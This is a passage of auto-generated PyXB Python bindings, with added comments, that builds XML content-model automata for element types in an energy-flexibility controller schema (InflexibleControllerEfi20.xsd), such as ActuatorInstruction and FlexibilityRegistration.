                           is_unordered_catenation=False)
    # The element may repeat indefinitely: loop back to the same state
    # with no counter updates.
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
# Install the ActuatorStatuses content-model automaton and register the
# single 'element' child of TargetProfile.
ActuatorStatuses._Automaton = _BuildAutomaton_34()
TargetProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_10, scope=TargetProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3)))
def _BuildAutomaton_35 ():
    """Construct the content-model automaton for TargetProfile.

    The model is a single repeating 'element' child: one accepting state
    with an unguarded self-loop and no counters.
    """
    # One-shot builder: remove it from the module namespace after use.
    global _BuildAutomaton_35
    del _BuildAutomaton_35
    import pyxb.utils.fac as fac

    element_use = pyxb.binding.content.ElementUse(
        TargetProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')),
        pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3))
    only_state = fac.State(element_use, is_initial=True, final_update=set(),
                           is_unordered_catenation=False)
    # Repeating element: self-loop with no counter updates.
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
# Install the TargetProfile content-model automaton and register the two
# alternative children of the anonymous complex type CTD_ANON_11.
TargetProfile._Automaton = _BuildAutomaton_35()
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageProfile'), StorageUsageProfile, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 772, 9)))
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageProbabilityProfile'), StorageUsageProbabilityProfile, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 773, 9)))
def _BuildAutomaton_36 ():
    """Construct the content-model automaton for CTD_ANON_11.

    Two initial states ('usageProfile' / 'usageProbabilityProfile') with
    no outgoing transitions: exactly one of the two elements occurs.
    """
    # One-shot builder: remove it from the module namespace after use.
    global _BuildAutomaton_36
    del _BuildAutomaton_36
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    automaton_states = []
    for tag, line in (('usageProfile', 772), ('usageProbabilityProfile', 773)):
        use = pyxb.binding.content.ElementUse(
            CTD_ANON_11._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(xsd, line, 9))
        state = fac.State(use, is_initial=True, final_update=set(),
                          is_unordered_catenation=False)
        # No successors: the content ends after the chosen element.
        state._set_transitionSet([])
        automaton_states.append(state)
    return fac.Automaton(automaton_states, set(), False, containing_state=None)
# Install the CTD_ANON_11 content-model automaton and register the child
# element declarations of ActuatorInstruction.
CTD_ANON_11._Automaton = _BuildAutomaton_36()
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), pyxb.binding.datatypes.int, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3)))
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3)))
ActuatorInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=ActuatorInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3)))
def _BuildAutomaton_37 ():
    """Build the FAC content-model automaton for ActuatorInstruction.

    Sequence: runningModeId, optional runningModeFactor (0..1 counter
    cc_0), then startTime.  Only the final state carries a (non-None)
    final_update, so content must reach startTime to be accepted.
    PyXB-generated code.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_37
    del _BuildAutomaton_37
    import pyxb.utils.fac as fac
    counters = set()
    # 0..1 counter guarding the optional runningModeFactor element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3))
    counters.add(cc_0)
    states = []
    # st_0: runningModeId — initial, non-accepting (final_update is None).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: runningModeFactor — non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: startTime — the accepting state (final_update is a set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(ActuatorInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_0 may be followed by the optional st_1 or jump straight to st_2.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    transitions.append(fac.Transition(st_2, [
        ]))
    st_0._set_transitionSet(transitions)
    # st_1 self-loop increments cc_0; advancing to st_2 finalizes it.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    # st_2 is terminal: no outgoing transitions.
    transitions = []
    st_2._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Install the ActuatorInstruction content-model automaton and register the
# single child element of ActuatorInstructions.
ActuatorInstruction._Automaton = _BuildAutomaton_37()
ActuatorInstructions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction'), ActuatorInstruction, scope=ActuatorInstructions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3)))
def _BuildAutomaton_38 ():
    """Construct the content-model automaton for ActuatorInstructions.

    The model is a single repeating 'actuatorInstruction' element: one
    accepting state with an unguarded self-loop and no counters.
    """
    # One-shot builder: remove it from the module namespace after use.
    global _BuildAutomaton_38
    del _BuildAutomaton_38
    import pyxb.utils.fac as fac

    element_use = pyxb.binding.content.ElementUse(
        ActuatorInstructions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction')),
        pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3))
    only_state = fac.State(element_use, is_initial=True, final_update=set(),
                           is_unordered_catenation=False)
    # Repeating element: self-loop with no counter updates.
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
# Install the ActuatorInstructions content-model automaton and register the
# child element declarations of AdjustableContinuousRunningModeData.
ActuatorInstructions._Automaton = _BuildAutomaton_38()
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3)))
def _BuildAutomaton_39 ():
    """Build the FAC content-model automaton for AdjustableContinuousRunningModeData.

    Six elements (runningCost, electricalPower, gasFlowRate,
    heatTemperature, heatFlowRate, heatThermalPower), each guarded by its
    own 0..1 counter.  Every state is initial and every state's
    final_update is a set, and the automaton is created with its third
    argument True — the whole content is optional and any subset, in
    schema order, is accepted.  PyXB-generated code.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_39
    del _BuildAutomaton_39
    import pyxb.utils.fac as fac
    counters = set()
    # One 0..1 counter per element (all six are optional).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
    counters.add(cc_3)
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
    counters.add(cc_4)
    cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
    counters.add(cc_5)
    states = []
    # st_0: runningCost.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: electricalPower.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: gasFlowRate.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: heatTemperature.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: heatFlowRate.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # st_5: heatThermalPower.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_5, False))
    symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
    st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # Triangular transition matrix: each state can self-loop (incrementing
    # its own counter with True) or advance to any later state (finalizing
    # its counter with False); earlier states are never revisited.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_4, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_4, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_5, True) ]))
    st_5._set_transitionSet(transitions)
    return fac.Automaton(states, counters, True, containing_state=None)
# Install the AdjustableContinuousRunningModeData content-model automaton
# and register the two alternative children of AdjustableRunningModes.
AdjustableContinuousRunningModeData._Automaton = _BuildAutomaton_39()
AdjustableRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), AdjustableDiscreteRunningMode, scope=AdjustableRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 873, 4)))
AdjustableRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), AdjustableContinuousRunningMode, scope=AdjustableRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 874, 4)))
def _BuildAutomaton_40 ():
    """Construct the content-model automaton for AdjustableRunningModes.

    A repeated choice of 'discreteRunningMode' / 'continuousRunningMode':
    both states are initial and accepting, each may be followed by either
    (a fully connected two-state graph), with no counters.
    """
    # One-shot builder: remove it from the module namespace after use.
    global _BuildAutomaton_40
    del _BuildAutomaton_40
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    mode_states = []
    for tag, line in (('discreteRunningMode', 873), ('continuousRunningMode', 874)):
        use = pyxb.binding.content.ElementUse(
            AdjustableRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(xsd, line, 4))
        mode_states.append(fac.State(use, is_initial=True, final_update=set(),
                                     is_unordered_catenation=False))
    # Any mode element may follow any other, with no counter updates.
    for state in mode_states:
        state._set_transitionSet([fac.Transition(dst, []) for dst in mode_states])
    return fac.Automaton(mode_states, set(), False, containing_state=None)
# Install the AdjustableRunningModes content-model automaton and register
# the child element declarations of FlexibilityRegistration.
AdjustableRunningModes._Automaton = _BuildAutomaton_40()
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay'), pyxb.binding.datatypes.duration, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5)))
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription'), DeviceDescription, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5)))
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currency'), CurrencyType, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5)))
def _BuildAutomaton_41 ():
    """Build the FAC content-model automaton for FlexibilityRegistration.

    Sequence: header -> instructionProcessingDelay -> deviceDescription
    -> optional currency (0..1 counter cc_0).  The 'header' element is
    inherited from the base message type (schema location 24,3).
    PyXB-generated code.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_41
    del _BuildAutomaton_41
    import pyxb.utils.fac as fac
    counters = set()
    # 0..1 counter guarding the optional trailing 'currency' element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
    counters.add(cc_0)
    states = []
    # st_0: header — initial, non-accepting (final_update is None).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: instructionProcessingDelay — non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: deviceDescription — accepting (currency may be omitted).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: currency — accepting, finalizing cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Linear chain st_0 -> st_1 -> st_2 -> st_3; st_3 self-loops on cc_0.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_3._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Install the FlexibilityRegistration content-model automaton and register
# the child element declarations of FlexibilityUpdate.
FlexibilityRegistration._Automaton = _BuildAutomaton_41()
FlexibilityUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), Identifier, scope=FlexibilityUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5)))
FlexibilityUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'validFrom'), pyxb.binding.datatypes.dateTime, scope=FlexibilityUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5)))
def _BuildAutomaton_42 ():
    """Construct the content-model automaton for FlexibilityUpdate.

    A strict three-element sequence with no optional parts:
    header -> flexibilityUpdateId -> validFrom.  Only the last state is
    accepting (its final_update is a set; the others are None).
    """
    # One-shot builder: remove it from the module namespace after use.
    global _BuildAutomaton_42
    del _BuildAutomaton_42
    import pyxb.utils.fac as fac

    xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, schema line, schema column, final_update) per state, in order.
    specs = (
        ('header', 24, 3, None),
        ('flexibilityUpdateId', 57, 5, None),
        ('validFrom', 58, 5, set()),
    )
    chain = []
    for position, (tag, line, col, accept) in enumerate(specs):
        use = pyxb.binding.content.ElementUse(
            FlexibilityUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(xsd, line, col))
        chain.append(fac.State(use, is_initial=(position == 0),
                               final_update=accept,
                               is_unordered_catenation=False))
    # Each state advances to its successor; the final state is terminal.
    for current, following in zip(chain, chain[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    chain[-1]._set_transitionSet([])
    return fac.Automaton(chain, set(), False, containing_state=None)
# Install the FlexibilityUpdate content-model automaton and register the
# child element declarations of Instruction.
FlexibilityUpdate._Automaton = _BuildAutomaton_42()
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5)))
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), Identifier, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5)))
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction'), pyxb.binding.datatypes.boolean, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5)))
def _BuildAutomaton_43 ():
    """Build the FAC content-model automaton for Instruction.

    A strict four-element sequence with no counters: header ->
    instructionId -> flexibilityUpdateId -> isEmergencyInstruction.
    Only the last state is accepting (final_update is a set; the earlier
    states carry None).  PyXB-generated code.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_43
    del _BuildAutomaton_43
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    # st_0: header — initial, non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: instructionId — non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: flexibilityUpdateId — non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: isEmergencyInstruction — the accepting, terminal state.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Linear chain st_0 -> st_1 -> st_2 -> st_3 with no counter updates.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    st_3._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Install the Instruction content-model automaton and register the child
# element declarations of the anonymous complex type CTD_ANON_12.
Instruction._Automaton = _BuildAutomaton_43()
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6)))
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'status'), InstructionStatus, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6)))
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'debugInformation'), pyxb.binding.datatypes.string, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6)))
def _BuildAutomaton_44 ():
    # Build the FAC content-model automaton for CTD_ANON_12:
    # header, instructionId, status, then an optional debugInformation.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_44
    del _BuildAutomaton_44
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 tracks the occurrence count of the optional (0..1) debugInformation element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6))
    counters.add(cc_0)
    states = []
    # 'header': required first element; final_update=None means this is not an accepting state.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # 'instructionId': required; also not an accepting state.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # 'status': required; the document may legitimately end here (empty final_update set).
    final_update = set()
